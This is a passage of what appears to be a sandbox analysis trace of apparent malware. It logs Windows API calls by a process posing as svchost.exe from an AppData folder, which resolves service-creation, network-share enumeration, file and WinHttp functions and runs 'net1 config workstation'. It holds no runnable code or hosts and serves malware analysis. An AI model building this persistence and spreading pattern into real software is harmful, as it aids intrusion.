	[0229.241] WriteFile (in: hFile=0x15c, lpBuffer=0x2e84c0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f7e0, lpOverlapped=0x0 | out: lpBuffer=0x2e84c0*, lpNumberOfBytesWritten=0x19f7e0*=0x2, lpOverlapped=0x0) returned 1
	[0229.241] LocalFree (hMem=0x2e84c0) returned 0x0
	[0229.244] NetApiBufferFree (Buffer=0x2de580) returned 0x0
	[0229.244] NetApiBufferFree (Buffer=0x2de598) returned 0x0
	[0229.244] GetCommandLineW () returned="C:\\Windows\\system32\\net1  config workstation"
	[0229.245] exit (_Code=0) 

Thread:
	id = 315
	os_tid = 0x3f8


Thread:
	id = 316
	os_tid = 0xd5c


Process:
	id = "50"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee17760"
	os_pid = "0xda0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "svchost.exe"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 318
	os_tid = 0xd90

	[0230.101] ResetEvent (hEvent=0x8) returned 1
	[0230.101] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.101] ResetEvent (hEvent=0x8) returned 1
	[0230.101] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.110] LoadLibraryW (lpLibFileName="ADVAPI32.dll") returned 0x774c0000
	[0230.111] ResetEvent (hEvent=0x8) returned 1
	[0230.111] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.138] GetProcAddress (hModule=0x774c0000, lpProcName="CloseServiceHandle") returned 0x774d369c
	[0230.139] ResetEvent (hEvent=0x8) returned 1
	[0230.139] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.141] GetProcAddress (hModule=0x774c0000, lpProcName="CreateServiceW") returned 0x774e712c
	[0230.141] ResetEvent (hEvent=0x8) returned 1
	[0230.141] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.143] GetProcAddress (hModule=0x774c0000, lpProcName="OpenSCManagerW") returned 0x774cca64
	[0230.143] ResetEvent (hEvent=0x8) returned 1
	[0230.143] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.146] GetProcAddress (hModule=0x774c0000, lpProcName="StartServiceW") returned 0x774c7974
	[0230.146] ResetEvent (hEvent=0x8) returned 1
	[0230.146] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.148] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0230.148] ResetEvent (hEvent=0x8) returned 1
	[0230.148] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.150] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0230.150] ResetEvent (hEvent=0x8) returned 1
	[0230.150] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.153] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileW") returned 0x76b467c3
	[0230.153] ResetEvent (hEvent=0x8) returned 1
	[0230.153] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.155] GetProcAddress (hModule=0x76b10000, lpProcName="CreateFileW") returned 0x76b5cc56
	[0230.155] ResetEvent (hEvent=0x8) returned 1
	[0230.155] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.157] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThread") returned 0x76b6375d
	[0230.157] ResetEvent (hEvent=0x8) returned 1
	[0230.157] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.160] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteFileW") returned 0x76b50f62
	[0230.160] ResetEvent (hEvent=0x8) returned 1
	[0230.160] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.162] GetProcAddress (hModule=0x76b10000, lpProcName="GetComputerNameW") returned 0x76b503ff
	[0230.162] ResetEvent (hEvent=0x8) returned 1
	[0230.162] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.164] GetProcAddress (hModule=0x76b10000, lpProcName="GetLastError") returned 0x76b5bf00
	[0230.164] ResetEvent (hEvent=0x8) returned 1
	[0230.164] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.167] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleA") returned 0x76b5cf41
	[0230.167] ResetEvent (hEvent=0x8) returned 1
	[0230.167] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.169] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0230.169] ResetEvent (hEvent=0x8) returned 1
	[0230.169] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.171] GetProcAddress (hModule=0x76b10000, lpProcName="HeapCreate") returned 0x76b63ea2
	[0230.171] ResetEvent (hEvent=0x8) returned 1
	[0230.171] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.174] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0230.174] ResetEvent (hEvent=0x8) returned 1
	[0230.174] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.176] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0230.176] ResetEvent (hEvent=0x8) returned 1
	[0230.176] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.186] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0230.186] ResetEvent (hEvent=0x8) returned 1
	[0230.186] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.188] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0230.188] ResetEvent (hEvent=0x8) returned 1
	[0230.188] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.191] GetProcAddress (hModule=0x76b10000, lpProcName="WriteFile") returned 0x76b61400
	[0230.191] ResetEvent (hEvent=0x8) returned 1
	[0230.191] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.193] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcmpW") returned 0x76b667b0
	[0230.193] ResetEvent (hEvent=0x8) returned 1
	[0230.193] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.196] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenW") returned 0x76b5d9e8
	[0230.196] ResetEvent (hEvent=0x8) returned 1
	[0230.196] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.199] LoadLibraryW (lpLibFileName="MPR.DLL") returned 0x71e30000
	[0230.200] ResetEvent (hEvent=0x8) returned 1
	[0230.200] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.202] GetProcAddress (hModule=0x71e30000, lpProcName="WNetAddConnection2W") returned 0x71e34744
	[0230.202] ResetEvent (hEvent=0x8) returned 1
	[0230.202] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.204] GetProcAddress (hModule=0x71e30000, lpProcName="WNetCancelConnection2W") returned 0x71e38cd1
	[0230.204] ResetEvent (hEvent=0x8) returned 1
	[0230.204] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.207] GetProcAddress (hModule=0x71e30000, lpProcName="WNetCloseEnum") returned 0x71e32dd6
	[0230.207] ResetEvent (hEvent=0x8) returned 1
	[0230.207] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.209] GetProcAddress (hModule=0x71e30000, lpProcName="WNetEnumResourceW") returned 0x71e33058
	[0230.209] ResetEvent (hEvent=0x8) returned 1
	[0230.209] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.212] GetProcAddress (hModule=0x71e30000, lpProcName="WNetOpenEnumW") returned 0x71e32f06
	[0230.212] ResetEvent (hEvent=0x8) returned 1
	[0230.212] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.214] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77330000
	[0230.214] ResetEvent (hEvent=0x8) returned 1
	[0230.214] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.216] GetProcAddress (hModule=0x77330000, lpProcName="_vsnwprintf") returned 0x7739caaa
	[0230.216] ResetEvent (hEvent=0x8) returned 1
	[0230.216] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.219] LoadLibraryW (lpLibFileName="USER32.dll") returned 0x76c00000
	[0230.233] ResetEvent (hEvent=0x8) returned 1
	[0230.233] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.236] GetProcAddress (hModule=0x76c00000, lpProcName="wsprintfA") returned 0x76c13f47
	[0230.236] ResetEvent (hEvent=0x8) returned 1
	[0230.236] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.238] GetProcAddress (hModule=0x76c00000, lpProcName="wsprintfW") returned 0x76c2426d
	[0230.238] ResetEvent (hEvent=0x8) returned 1
	[0230.238] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.241] LoadLibraryW (lpLibFileName="WINHTTP.dll") returned 0x719a0000
	[0230.243] ResetEvent (hEvent=0x8) returned 1
	[0230.244] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.246] GetProcAddress (hModule=0x719a0000, lpProcName="WinHttpCloseHandle") returned 0x719a2c01
	[0230.246] ResetEvent (hEvent=0x8) returned 1
	[0230.246] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.249] GetProcAddress (hModule=0x719a0000, lpProcName="WinHttpConnect") returned 0x719ad9f5
	[0230.249] ResetEvent (hEvent=0x8) returned 1
	[0230.249] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.251] GetProcAddress (hModule=0x719a0000, lpProcName="WinHttpOpen") returned 0x719a58b9
	[0230.251] ResetEvent (hEvent=0x8) returned 1
	[0230.251] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.254] GetProcAddress (hModule=0x719a0000, lpProcName="WinHttpOpenRequest") returned 0x719a4aea
	[0230.254] ResetEvent (hEvent=0x8) returned 1
	[0230.254] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.256] GetProcAddress (hModule=0x719a0000, lpProcName="WinHttpQueryDataAvailable") returned 0x719bc5dd
	[0230.257] ResetEvent (hEvent=0x8) returned 1
	[0230.257] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.259] GetProcAddress (hModule=0x719a0000, lpProcName="WinHttpReadData") returned 0x719acb9e
	[0230.259] ResetEvent (hEvent=0x8) returned 1
	[0230.259] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.262] GetProcAddress (hModule=0x719a0000, lpProcName="WinHttpReceiveResponse") returned 0x719ab262
	[0230.262] ResetEvent (hEvent=0x8) returned 1
	[0230.262] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.265] GetProcAddress (hModule=0x719a0000, lpProcName="WinHttpSendRequest") returned 0x719a79bd
	[0230.265] ResetEvent (hEvent=0x8) returned 1
	[0230.265] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.307] GetModuleHandleA (lpModuleName=0x0) returned 0x600000
	[0230.307] ResetEvent (hEvent=0x8) returned 1
	[0230.307] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.311] ResetEvent (hEvent=0x8) returned 1
	[0230.311] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0230.315] HeapCreate (flOptions=0x1, dwInitialSize=0x100000, dwMaximumSize=0x0) returned 0x1790000
	[0230.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6cd41000, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x9f750 | out: lpThreadId=0x9f750*=0xdcc) returned 0x54
	[0230.319] ResetEvent (hEvent=0x8) returned 1
	[0230.319] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) 

Thread:
	id = 320
	os_tid = 0xdcc

	[0230.319] Sleep (dwMilliseconds=0x1) 
	[0230.335] GetLastError () returned 0x57
	[0230.335] Sleep (dwMilliseconds=0x1) 
	[0230.350] GetLastError () returned 0x57
	[0230.350] Sleep (dwMilliseconds=0x1) 
	[0230.366] GetLastError () returned 0x57
	[0230.366] Sleep (dwMilliseconds=0x1) 
	[0230.382] GetLastError () returned 0x57
	[0230.382] Sleep (dwMilliseconds=0x1) 
	[0230.398] GetLastError () returned 0x57
	[0230.398] Sleep (dwMilliseconds=0x1) 
	[0230.413] GetLastError () returned 0x57
	[0230.413] Sleep (dwMilliseconds=0x1) 
	[0230.429] GetLastError () returned 0x57
	[0230.429] Sleep (dwMilliseconds=0x1) 
	[0230.478] GetLastError () returned 0x57
	[0230.478] Sleep (dwMilliseconds=0x1) 
	[0230.491] GetLastError () returned 0x57
	[0230.491] Sleep (dwMilliseconds=0x1) 
	[0230.506] GetLastError () returned 0x57
	[0230.506] Sleep (dwMilliseconds=0x1) 
	[0230.522] GetLastError () returned 0x57
	[0230.522] Sleep (dwMilliseconds=0x1) 
	[0230.538] GetLastError () returned 0x57
	[0230.538] Sleep (dwMilliseconds=0x1) 
	[0230.553] GetLastError () returned 0x57
	[0230.553] Sleep (dwMilliseconds=0x1) 
	[0230.569] GetLastError () returned 0x57
	[0230.569] Sleep (dwMilliseconds=0x1) 
	[0230.584] GetLastError () returned 0x57
	[0230.584] Sleep (dwMilliseconds=0x1) 
	[0230.600] GetLastError () returned 0x57
	[0230.600] Sleep (dwMilliseconds=0x1) 
	[0230.615] GetLastError () returned 0x57
	[0230.615] Sleep (dwMilliseconds=0x1) 
	[0230.631] GetLastError () returned 0x57
	[0230.631] Sleep (dwMilliseconds=0x1) 
	[0230.647] GetLastError () returned 0x57
	[0230.647] Sleep (dwMilliseconds=0x1) 
	[0230.663] GetLastError () returned 0x57
	[0230.663] Sleep (dwMilliseconds=0x1) 
	[0230.680] GetLastError () returned 0x57
	[0230.680] Sleep (dwMilliseconds=0x1) 
	[0230.694] GetLastError () returned 0x57
	[0230.694] Sleep (dwMilliseconds=0x1) 
	[0230.709] GetLastError () returned 0x57
	[0230.709] Sleep (dwMilliseconds=0x1) 
	[0230.726] GetLastError () returned 0x57
	[0230.726] Sleep (dwMilliseconds=0x1) 
	[0230.741] GetLastError () returned 0x57
	[0230.741] Sleep (dwMilliseconds=0x1) 
	[0230.756] GetLastError () returned 0x57
	[0230.756] Sleep (dwMilliseconds=0x1) 
	[0230.772] GetLastError () returned 0x57
	[0230.772] Sleep (dwMilliseconds=0x1) 
	[0230.789] GetLastError () returned 0x57
	[0230.789] Sleep (dwMilliseconds=0x1) 
	[0230.803] GetLastError () returned 0x57
	[0230.803] Sleep (dwMilliseconds=0x1) 
	[0230.818] GetLastError () returned 0x57
	[0230.818] Sleep (dwMilliseconds=0x1) 
	[0230.835] GetLastError () returned 0x57
	[0230.835] Sleep (dwMilliseconds=0x1) 
	[0230.849] GetLastError () returned 0x57
	[0230.849] Sleep (dwMilliseconds=0x1) 
	[0230.866] GetLastError () returned 0x57
	[0230.866] Sleep (dwMilliseconds=0x1) 
	[0230.881] GetLastError () returned 0x57
	[0230.881] Sleep (dwMilliseconds=0x1) 
	[0230.896] GetLastError () returned 0x57
	[0230.896] Sleep (dwMilliseconds=0x1) 
	[0230.912] GetLastError () returned 0x57
	[0230.912] Sleep (dwMilliseconds=0x1) 
	[0230.928] GetLastError () returned 0x57
	[0230.928] Sleep (dwMilliseconds=0x1) 
	[0230.955] GetLastError () returned 0x57
	[0230.956] Sleep (dwMilliseconds=0x1) 
	[0230.960] GetLastError () returned 0x57
	[0230.960] Sleep (dwMilliseconds=0x1) 
	[0230.974] GetLastError () returned 0x57
	[0230.974] Sleep (dwMilliseconds=0x1) 
	[0230.990] GetLastError () returned 0x57
	[0230.990] Sleep (dwMilliseconds=0x1) 
	[0231.006] GetLastError () returned 0x57
	[0231.006] Sleep (dwMilliseconds=0x1) 
	[0231.021] GetLastError () returned 0x57
	[0231.021] Sleep (dwMilliseconds=0x1) 
	[0231.037] GetLastError () returned 0x57
	[0231.037] Sleep (dwMilliseconds=0x1) 
	[0231.052] GetLastError () returned 0x57
	[0231.052] Sleep (dwMilliseconds=0x1) 
	[0231.068] GetLastError () returned 0x57
	[0231.068] Sleep (dwMilliseconds=0x1) 
	[0231.083] GetLastError () returned 0x57
	[0231.083] Sleep (dwMilliseconds=0x1) 
	[0231.099] GetLastError () returned 0x57
	[0231.099] Sleep (dwMilliseconds=0x1) 
	[0231.115] GetLastError () returned 0x57
	[0231.115] Sleep (dwMilliseconds=0x1) 
	[0231.130] GetLastError () returned 0x57
	[0231.130] Sleep (dwMilliseconds=0x1) 
	[0231.146] GetLastError () returned 0x57
	[0231.146] Sleep (dwMilliseconds=0x1) 
	[0231.161] GetLastError () returned 0x57
	[0231.161] Sleep (dwMilliseconds=0x1) 
	[0231.177] GetLastError () returned 0x57
	[0231.177] Sleep (dwMilliseconds=0x1) 
	[0231.192] GetLastError () returned 0x57
	[0231.192] Sleep (dwMilliseconds=0x1) 
	[0231.208] GetLastError () returned 0x57
	[0231.208] Sleep (dwMilliseconds=0x1) 
	[0231.224] GetLastError () returned 0x57
	[0231.224] Sleep (dwMilliseconds=0x1) 
	[0231.239] GetLastError () returned 0x57
	[0231.239] Sleep (dwMilliseconds=0x1) 
	[0231.255] GetLastError () returned 0x57
	[0231.255] Sleep (dwMilliseconds=0x1) 
	[0231.271] GetLastError () returned 0x57
	[0231.271] Sleep (dwMilliseconds=0x1) 
	[0231.286] GetLastError () returned 0x57
	[0231.286] Sleep (dwMilliseconds=0x1) 
	[0231.302] GetLastError () returned 0x57
	[0231.302] Sleep (dwMilliseconds=0x1) 
	[0231.318] GetLastError () returned 0x57
	[0231.318] Sleep (dwMilliseconds=0x1) 
	[0231.333] GetLastError () returned 0x57
	[0231.333] Sleep (dwMilliseconds=0x1) 
	[0231.352] GetLastError () returned 0x57
	[0231.352] Sleep (dwMilliseconds=0x1) 
	[0231.364] GetLastError () returned 0x57
	[0231.364] Sleep (dwMilliseconds=0x1) 
	[0231.380] GetLastError () returned 0x57
	[0231.380] Sleep (dwMilliseconds=0x1) 
	[0231.395] GetLastError () returned 0x57
	[0231.395] Sleep (dwMilliseconds=0x1) 
	[0231.416] GetLastError () returned 0x57
	[0231.416] Sleep (dwMilliseconds=0x1) 
	[0231.435] GetLastError () returned 0x57
	[0231.435] Sleep (dwMilliseconds=0x1) 
	[0231.442] GetLastError () returned 0x57
	[0231.442] Sleep (dwMilliseconds=0x1) 
	[0231.458] GetLastError () returned 0x57
	[0231.458] Sleep (dwMilliseconds=0x1) 
	[0231.474] GetLastError () returned 0x57
	[0231.474] Sleep (dwMilliseconds=0x1) 
	[0231.489] GetLastError () returned 0x57
	[0231.489] Sleep (dwMilliseconds=0x1) 
	[0231.505] GetLastError () returned 0x57
	[0231.505] Sleep (dwMilliseconds=0x1) 
	[0231.521] GetLastError () returned 0x57
	[0231.521] Sleep (dwMilliseconds=0x1) 
	[0231.536] GetLastError () returned 0x57
	[0231.536] Sleep (dwMilliseconds=0x1) 
	[0231.551] GetLastError () returned 0x57
	[0231.551] Sleep (dwMilliseconds=0x1) 
	[0231.567] GetLastError () returned 0x57
	[0231.567] Sleep (dwMilliseconds=0x1) 
	[0231.583] GetLastError () returned 0x57
	[0231.583] Sleep (dwMilliseconds=0x1) 
	[0231.598] GetLastError () returned 0x57
	[0231.598] Sleep (dwMilliseconds=0x1) 
	[0231.614] GetLastError () returned 0x57
	[0231.614] Sleep (dwMilliseconds=0x1) 
	[0231.630] GetLastError () returned 0x57
	[0231.630] Sleep (dwMilliseconds=0x1) 
	[0231.645] GetLastError () returned 0x57
	[0231.645] Sleep (dwMilliseconds=0x1) 
	[0231.660] GetLastError () returned 0x57
	[0231.660] Sleep (dwMilliseconds=0x1) 
	[0231.676] GetLastError () returned 0x57
	[0231.676] Sleep (dwMilliseconds=0x1) 
	[0231.692] GetLastError () returned 0x57
	[0231.692] Sleep (dwMilliseconds=0x1) 
	[0231.707] GetLastError () returned 0x57
	[0231.707] Sleep (dwMilliseconds=0x1) 
	[0231.723] GetLastError () returned 0x57
	[0231.723] Sleep (dwMilliseconds=0x1) 
	[0231.739] GetLastError () returned 0x57
	[0231.739] Sleep (dwMilliseconds=0x1) 
	[0231.755] GetLastError () returned 0x57
	[0231.755] Sleep (dwMilliseconds=0x1) 
	[0231.773] GetLastError () returned 0x57
	[0231.773] Sleep (dwMilliseconds=0x1) 
	[0231.785] GetLastError () returned 0x57
	[0231.785] Sleep (dwMilliseconds=0x1) 
	[0231.801] GetLastError () returned 0x57
	[0231.801] Sleep (dwMilliseconds=0x1) 
	[0231.820] GetLastError () returned 0x57
	[0231.820] Sleep (dwMilliseconds=0x1) 
	[0231.832] GetLastError () returned 0x57
	[0231.832] Sleep (dwMilliseconds=0x1) 
	[0231.848] GetLastError () returned 0x57
	[0231.848] Sleep (dwMilliseconds=0x1) 
	[0231.863] GetLastError () returned 0x57
	[0231.863] Sleep (dwMilliseconds=0x1) 
	[0231.879] GetLastError () returned 0x57
	[0231.879] Sleep (dwMilliseconds=0x1) 
	[0231.894] GetLastError () returned 0x57
	[0231.894] Sleep (dwMilliseconds=0x1) 
	[0231.910] GetLastError () returned 0x57
	[0231.910] RtlAllocateHeap (HeapHandle=0x1790000, Flags=0x8, Size=0x208) returned 0x188e578
	[0231.910] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xe3cc8
	[0231.934] Sleep (dwMilliseconds=0x1) 
	[0231.950] GetLastError () returned 0x0
	[0231.950] Sleep (dwMilliseconds=0x1) 
	[0231.957] GetLastError () returned 0x0
	[0231.957] Sleep (dwMilliseconds=0x1) 
	[0231.972] GetLastError () returned 0x0
	[0231.972] Sleep (dwMilliseconds=0x1) 
	[0231.988] GetLastError () returned 0x0
	[0231.988] Sleep (dwMilliseconds=0x1) 
	[0232.004] GetLastError () returned 0x0
	[0232.004] Sleep (dwMilliseconds=0x1) 
	[0232.019] GetLastError () returned 0x0
	[0232.019] Sleep (dwMilliseconds=0x1) 
	[0232.039] GetLastError () returned 0x0
	[0232.039] Sleep (dwMilliseconds=0x1) 
	[0232.052] GetLastError () returned 0x0
	[0232.052] Sleep (dwMilliseconds=0x1) 
	[0232.066] GetLastError () returned 0x0
	[0232.066] Sleep (dwMilliseconds=0x1) 
	[0232.082] GetLastError () returned 0x0
	[0232.082] Sleep (dwMilliseconds=0x1) 
	[0232.097] GetLastError () returned 0x0
	[0232.097] Sleep (dwMilliseconds=0x1) 
	[0232.113] GetLastError () returned 0x0
	[0232.113] Sleep (dwMilliseconds=0x1) 
	[0232.129] GetLastError () returned 0x0
	[0232.129] Sleep (dwMilliseconds=0x1) 
	[0232.144] GetLastError () returned 0x0
	[0232.144] Sleep (dwMilliseconds=0x1) 
	[0232.160] GetLastError () returned 0x0
	[0232.160] Sleep (dwMilliseconds=0x1) 
	[0232.175] GetLastError () returned 0x0
	[0232.175] Sleep (dwMilliseconds=0x1) 
	[0232.191] GetLastError () returned 0x0
	[0232.191] Sleep (dwMilliseconds=0x1) 
	[0232.206] GetLastError () returned 0x0
	[0232.206] Sleep (dwMilliseconds=0x1) 
	[0232.255] GetLastError () returned 0x0
	[0232.255] Sleep (dwMilliseconds=0x1) 
	[0232.269] GetLastError () returned 0x0
	[0232.269] Sleep (dwMilliseconds=0x1) 
	[0232.284] GetLastError () returned 0x0
	[0232.285] Sleep (dwMilliseconds=0x1) 
	[0232.300] GetLastError () returned 0x0
	[0232.300] Sleep (dwMilliseconds=0x1) 
	[0232.316] GetLastError () returned 0x0
	[0232.316] Sleep (dwMilliseconds=0x1) 
	[0232.332] GetLastError () returned 0x0
	[0232.332] Sleep (dwMilliseconds=0x1) 
	[0232.347] GetLastError () returned 0x0
	[0232.347] Sleep (dwMilliseconds=0x1) 
	[0232.363] GetLastError () returned 0x0
	[0232.363] Sleep (dwMilliseconds=0x1) 
	[0232.379] GetLastError () returned 0x0
	[0232.379] Sleep (dwMilliseconds=0x1) 
	[0232.395] GetLastError () returned 0x0
	[0232.395] Sleep (dwMilliseconds=0x1) 
	[0232.411] GetLastError () returned 0x0
	[0232.411] Sleep (dwMilliseconds=0x1) 
	[0232.425] GetLastError () returned 0x0
	[0232.425] Sleep (dwMilliseconds=0x1) 
	[0232.441] GetLastError () returned 0x0
	[0232.441] Sleep (dwMilliseconds=0x1) 
	[0232.456] GetLastError () returned 0x0
	[0232.456] Sleep (dwMilliseconds=0x1) 
	[0232.472] GetLastError () returned 0x0
	[0232.472] Sleep (dwMilliseconds=0x1) 
	[0232.487] GetLastError () returned 0x0
	[0232.487] Sleep (dwMilliseconds=0x1) 
	[0232.503] GetLastError () returned 0x0
	[0232.503] Sleep (dwMilliseconds=0x1) 
	[0232.518] GetLastError () returned 0x0
	[0232.519] Sleep (dwMilliseconds=0x1) 
	[0232.534] GetLastError () returned 0x0
	[0232.534] Sleep (dwMilliseconds=0x1) 
	[0232.552] GetLastError () returned 0x0
	[0232.552] Sleep (dwMilliseconds=0x1) 
